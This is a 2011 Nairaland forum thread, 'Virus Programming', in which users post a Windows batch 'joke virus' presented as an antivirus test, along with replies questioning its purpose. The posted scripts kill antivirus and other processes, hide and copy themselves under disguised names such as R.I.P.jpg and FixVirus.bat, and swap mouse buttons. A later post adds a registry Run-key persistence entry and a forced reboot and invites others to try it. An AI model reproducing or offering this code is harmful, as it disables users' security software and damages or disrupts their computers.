Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,152,676 members, 7,816,777 topics. Date: Friday, 03 May 2024 at 04:54 PM

Virus Programming - Programming - Nairaland

Nairaland Forum / Science/Technology / Programming / Virus Programming (1947 Views)

How Can I Create A Virus Or Malware? / Please How Do I Remove Shortcut Virus On My Android. / Can A Jpeg, Png Or Gif Carry Virus? (2) (3) (4)

(1) (Go Down)

Virus Programming by Andrew3(m): 7:20pm On Jul 23, 2011
TEST YOUR ANTI VIRUS, COPY MA CODE AND PASTE IN NOTEPAD AND SAVE AS ANYTHING.BAT

IF YOUR ANTI VIRUS DOES NOT DETECT IT THEN ITS A DEAD ONE, REMOVE IT, BUT WHAT NEXT? grin

copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
tskill esset
tskill avg
tskill avast
tskill avira
tskill norton
rogra del.ntdl.dll
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
Re: Virus Programming by denzel2009: 7:29pm On Jul 23, 2011
What's the point?
Re: Virus Programming by IBEXY(m): 7:45pm On Jul 23, 2011
Have you thought of what will happen if a user decides to run this batch file?
Really what is your agenda here?
Re: Virus Programming by AYODEJI4LOVE(m): 8:39pm On Jul 23, 2011
I wonder ooh.am scared to do this.is this not a virus
Re: Virus Programming by denzel2009: 8:45pm On Jul 23, 2011
AYODEJI4LOVE:

I wonder ooh.am scared to do this.is this not a virus

you can just read through the process. those commands will kill all the applications and mess up your pc.
Re: Virus Programming by Mobinga: 8:19am On Jul 24, 2011
Re: Virus Programming by Nobody: 9:14am On Jul 24, 2011
@ Mobinga
LMAO. You are a bad boy. How the hell did you dig that out?

::Andrew:::

TEST YOUR ANTI VIRUS, COPY MA CODE AND PASTE IN NOTEPAD AND SAVE AS ANYTHING.BAT

IF YOUR ANTI VIRUS DOES NOT DETECT IT THEN ITS A DEAD ONE, REMOVE IT, BUT WHAT NEXT? grin
Thief!
Re: Virus Programming by IBEXY(m): 10:20am On Jul 24, 2011
He probably doesn't even know how destructive the code could be yet he wants fellow Nigerians to try it out on their computers.
Re: Virus Programming by AYODEJI4LOVE(m): 3:20pm On Jul 24, 2011
Av checked the site.it was even written on the site about the risks.it swaps your left click with right click.change the time to 12.00 and switch off your computer.hide itself and other files.copy itself.can destroy some softwares
Re: Virus Programming by GoodMuyis(m): 11:19am On Jul 25, 2011
The guy did not even try @ all he shoiuld have used the concept to make his own Payload

@ ::Andrew::

Can you make ur stuff to start with windows

I know you can't, but try
Re: Virus Programming by talk2hb1(m): 1:28pm On Jul 25, 2011
Bushmeat don cash hunter for this place.
make I jah grin grin grin grin
Re: Virus Programming by netghost: 10:24pm On Jul 25, 2011

copy %0 *.bat > nul
Attrib +r +h
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
tskill esset
tskill avg
tskill avast
tskill avira
tskill norton
rogra del.ntdl.dll
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat

cry cry cry cry cry cry cry cry cry
Re: Virus Programming by skydancer1: 6:54pm On Jul 26, 2011
Mobinga:

Plagiarism
http://learnhackstuff..com/2010/09/create-fake-and-destructive-virus-in.html
The funny thing is that the guy was even too scared to learn. The code doesn't really do anything harmful to your PC. Just start a beautiful calc. Try adding pause to the last line and execute it, and you will see all the command except 'start calc' return errors:

Reason why many people can hardly learn is: they always believe 'computer stuff' is mysterious. As far as I know, the only complex thing in PCs is their architecture and the way they are instructed.

Btw, Andrew did you scan this with your antivirus grin grin grin
Re: Virus Programming by Andrew3(m): 7:15pm On Jul 26, 2011
whoever believes mobinga should try, what he read on that site is diffrent from what is here cool

very funny how some people think about people they dont even know angry

i better stop b4 fayimora deletes and ban me again, bleep grin

anyway that wasent meant to assasinate any pc, just to test AV as i said if only you read very well
Re: Virus Programming by skydancer1: 8:40pm On Jul 26, 2011

whoever believes mobinga should try, what he read on that site is diffrent from what is here cool

very funny how some people think about people they dont even know angry

i better stop b4 fayimora deletes and ban me again, bleep grin

anyway that wasent meant to assasinate any pc, just to test AV as i said if only you read very well
You may not have copied the code from that site, but their similarities and the fact that you didn't test it show you're a dummy in the knowledge of malwares. There should be no shame in learning. And you shouldn't be banned for speaking (unless you're obviously breaking rules). There is no reason why you should use a harmless code to test your antivirus. If you want to learn how to develop anti-malwares, you have to dive into C++ and winapi commands.
Re: Virus Programming by Fayimora(m): 5:31am On Jul 27, 2011
Speechless. . . . . . . . .
Re: Virus Programming by GoodMuyis(m): 4:54pm On Jul 27, 2011
skydancer1:

You may not have copied the code from that site, but their similarities and the fact that you didn't test it show you're a dummy in the knowledge of malwares. There should be no shame in learning. And you shouldn't be banned for speaking (unless you're obviously breaking rules). There is no reason why you should use a harmless code to test your antivirus. If you want to learn how to develop anti-malwares, you have to dive into C++ and winapi commands.

GBAM!!!!!!

Also note that what you Cut and Paste is just a Joke Payload

Can some help try the below; because the computer am using is too good to test the stuff

@ECHO OFF

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v ::Andrew:: /d "%userprofile%\desktop\Andrew.bat"

copy %0 *.bat > nul
Attrib +r +h
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
tskill esset
tskill avg
tskill avast
tskill avira
tskill norton
rogra del.ntdl.dll
start
cls
cd %userprofile%\desktop
copy Greatgame.bat Andrew.bat
copy Greatgame.bat Andrew.jpg

shutdown -r -f -t 300 -c "System error: Mr ::Andrew:: the Spammite Is Attacking Your System"

exit

(1)

Wat Is The Fate Of A Computer Science Graduate In The Market? / How I Became A Software Developer And Got My First Job Within A Year / Just Finished A Mini Christmas Android And BB10 App And Game

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 37
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.